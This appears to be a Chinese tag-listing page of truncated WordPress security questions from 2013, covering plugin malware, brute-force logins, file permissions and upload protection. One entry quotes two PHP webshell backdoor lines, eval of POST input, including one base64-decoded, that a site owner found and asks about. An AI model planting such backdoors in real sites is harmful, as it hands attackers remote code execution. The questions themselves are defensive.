您当前的位置:首页 > TAG信息列表 > security

  • 防止WordPress插件更新中的恶意代码

    时间:2013-04-09

    Wordpress插件数据库中列出的最流行的Wordpress插件之一最近(2013年4月)被注入了恶意代码:http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html2011年发生了类似的事情:http://blog.sucuri.net/2011/06/wordpress-plugins-hacked-understanding-the-backdoor.html我如何防止用最新的插件更新我的Wordpress站点,

  • 更改数据库的管理员用户ID

    时间:2013-04-11

    通过wordpress的better wp security插件将默认管理员用户id从1更改为任何其他数字是否正确?管理安全的最佳方式是什么。谢谢

  • 失败的登录尝试、暴力攻击的增加?

    时间:2013-04-12

    我安装了插件Simple Login Lockdown,几天前数据库每天记录了200多条记录。我认为我的网站不可能受到这么多IP的攻击你觉得有什么不对吗?

  • Wordfence检测wp-admin/includes/upgrade.php中的更改

    时间:2013-04-13

    我将我的站点从托管提供商A和域名B移动到托管提供商X和域名Y。我在旧站点中设置了Wordfence。我刚刚把它安装在新网站上,并进行了扫描。Wordfence在wp admin/includes/upgrade中发现以下更改。php:279 @wp_mail($email, __(\'New WordPress Site\'), $message); 成为279 //@wp_mail($email, __(\'New WordPress Site\'), $message);&#x

  • Suspicious Files

    时间:2013-04-13

    嗨,我在我的网站上发现了两个可疑文件:我的主题中的第一个(404.php), 添加此行后<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?></中的第二个/wp-admin/ 调用wp-class.php.唯一的一行是:<?eval($_POST[joao]);?>有人能告诉我这是做什么的,我应该采取什么步骤吗?

  • 如果我使用替代登录(例如CAS或其他SSO)插件,我的站点是否受到保护,不受最近的暴力登录尝试的影响?

    时间:2013-04-14

    我听说recent increase in brute-force WordPress login attempts 由于大规模僵尸网络攻击。到目前为止,我读到的所有内容都表明,攻击只需对“admin”帐户尝试不同的密码即可。如果我使用其他登录方法,例如CAS 或者其他单点登录提供程序,假设SSO提供程序的管理员帐户上没有简单的密码(如果存在的话),我的WordPress安装是否可以安全地抵御这些攻击?

  • WordPress内置的自定义字段不会验证或清理吗?有什么办法可以解决这个问题吗?

    时间:2013-04-16

    我惊讶地发现,当使用post editor页面上的默认/内置自定义字段创建post meta时,它允许您输入如下标记:<a>,<script>,etc. 然后我意识到您也可以输入:<script> </script> 进入“发布内容”框。是否有办法钩住验证并使其无法输入脚本?我是否错误地认为,可以访问后端的黑客可以使用这些字段将恶意脚本获取到数据库?我想我只是有点困惑,因为在使用设置api(甚至创建自定义元盒)时,对正确验证/转义的强

  • 我应该删除install.php并安装-helper.php吗?

    时间:2013-04-21

    正在保留wp-admin/install.php 和wp-admin/install-helper.php wordpress新版本的安全漏洞?默认情况下,这些文件的文件权限为644。如果有任何泄漏,请问是哪种泄漏?

  • 为什么WordPress会更改文件的权限?

    时间:2013-04-22

    如果我在我的主题中将CSS文件的权限设置为444,然后尝试在外观编辑器中编辑它,WordPress不会被阻止编辑该文件,事实上,在编辑时会将权限更改为644。为什么WordPress会更改文件的权限?如何使网站更安全并防止出现这种情况?

  • 试图了解黑客行为的本质

    时间:2013-04-23

    今天,我们突然看到在wordpress网站的根文件夹中创建了两个文件-文件名owp.php 和gmail.html 在调查访问日志时,发现以下条目似乎是恶意的,与创建此文件的时间相似。91.207.9.226 - - [23/Apr/2013:17:41:19 +0530] \"GET / HTTP/1.1\" 200 19928 \"http://remont-mobile-phones.ru/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;

  • 所有本地网站都可以接受[admin/admin]吗?

    时间:2013-04-29

    在工作的本地服务器上,对所有客户端网站使用相同的凭据[管理员/管理员]是否存在安全问题?

  • 我如何知道是谁更改了密码?

    时间:2013-04-29

    我们最近有一位员工离开了我们公司。当他们离开时,我更改了他们的所有密码,删除了他们的电子邮件访问权限等。我还更改了Wordpress网站上管理员登录的密码,并将主要电子邮件更改为我自己的。但我没有更改自己的电子邮件密码。昨天,我收到Wordpress的两封电子邮件,说有一个密码重置请求。其中一封邮件被点击(你可以在Gmail中看到),我们的Wordpress密码也被更改了。我立即再次更改了它,然后更改了我自己的电子邮件密码。是否有任何方法可以跟踪谁请求更改密码,以及谁访问了我的电子邮件。(我们在这里通过谷

  • 为什么我的插件会自动更新?

    时间:2013-05-03

    我有一个wordpress网站和一些插件。我必须对插件进行一些自定义更改(不是最佳实践),当然我不想更新该插件。但出于某种原因,我所有的插件都在自动更新自己,而没有询问。(这可能吗?!!)。我以前从未有过这种行为。我知道,每当有新版本可用时,一些插件会显示通知,然后我必须单击以更新它。我的问题是:Is it possible that my plugins are updating without asking? 或者这可能是一个安全问题,我可能有一个不需要的管理员更新插件?--编辑--我想我发现了我的问

  • 如何通过.htaccess保护wp-admin?

    时间:2013-05-14

    我想在服务器级别保护/wp admin/目录。这意味着两次登录。一个通过服务器,另一个通过WordPress。我相信这是可以解决的。htaccess。有人知道怎么做吗?此外,是否有需要访问的文件(即admin ajax.php)?

  • WP Cron不在POST正文中保存<iframe>或<Object>

    时间:2013-05-24

    我正在使用wp_cron 从远程网站自动抓取帖子并将其保存在我的wp db中。NOTICE! I am executing my code from my plugin, not from my template functions.php or somewhere else. I have my own validation of grabbed content to prevent malicious code etc. so turning off security validation in wo

  • 我如何才能轻松验证核心或插件更新没有损坏任何东西?

    时间:2013-05-24

    我在想办法让更新WordPress对我来说不那么可怕。在我的职业生涯中,我创建了大约30个基于WP的公司网站,我觉得在安全方面对它们负有一定的责任。即使客户不付我维护费——每隔几个月点击一次“更新”按钮也没什么大不了的,对吧?出于以下几个原因,我一直抵制升级如果网站在更新过程中出现故障,客户通常不愿意支付修复所有故障所需的时间。“它确实有用,你为什么要改变它?!”唯一的选择是回滚并锁定站点。如果有什么东西破坏了网站,而我没有注意到,我就完蛋了。我不想再解释为什么更新后的联系方式在几周内不起作用了。公司网站

  • 限制对(某些)上传/下载的访问的简单解决方案

    时间:2013-05-27

    初始情况对于我正在建立的一个网站,我研究了保护上传/下载的整个领域,并根据用户角色/功能限制对其的访问。当然,我已经阅读了之前与(一般)主题相关的一些问题,出于参考原因,我发现了最重要/最有趣的问题:How to Protect Uploads, if User is not Logged In?How to restrict access to uploaded files?Restricting access to files within a specific folderHow to make m

  • Secure Pages Best Practice

    时间:2013-05-30

    我正在编写一个插件,该插件具有显示用户信息/数据的前端短代码。如果用户未登录,我需要重定向到前端登录页面/表单。这里的最佳做法是什么?我的插件创建我使用的页面,并向这些页面添加短代码。所以,如果有办法“保护”这些页面,我很想知道。

  • Wordpress容易受到“评论帖子伪造”的影响吗?

    时间:2013-06-04

    我最近扫描了我的Wordpress网站,使用6scan\'的安全扫描服务。它报告了一个高度严重的漏洞:“Wordpress评论发布伪造”。6scan的技术细节:6scan报告称“中的CSRF漏洞允许恶意用户伪造帖子”。它说受影响的URL是/wp评论帖子。php。当我单击6scan报告的链接了解更多技术细节时,它会指示我this page, 这是一个通用页面,涉及零日漏洞(即向Wordpress团队披露但尚未公开的漏洞)。然而,该页面自2012年7月17日(近一年前)以来一直没有更新,也没有具体提及CSRF

  • 密码保护一些上传的文件,因此只有登录的用户才能查看它们

    时间:2013-06-05

    我想保护一些上传的文件,使它们不可公开访问(没有登录就无法访问)。我正在上传一些PDF文件,我想将其中一些文件标记为受保护,因此如果不登录Wordpress网站,就无法访问这些文件。我目前正在使用Member Access,它允许我将一些帖子和页面标记为受保护(因此只有登录的用户才能查看它们)。这太棒了。但是,它不提供任何方式来保护媒体上载(即附件)。请注意,我不想保护所有上传,只想保护其中一些。一些上载需要对公众开放,而其他上载则只能对登录用户开放。我更喜欢通过Wordpress管理界面(而不是需要手动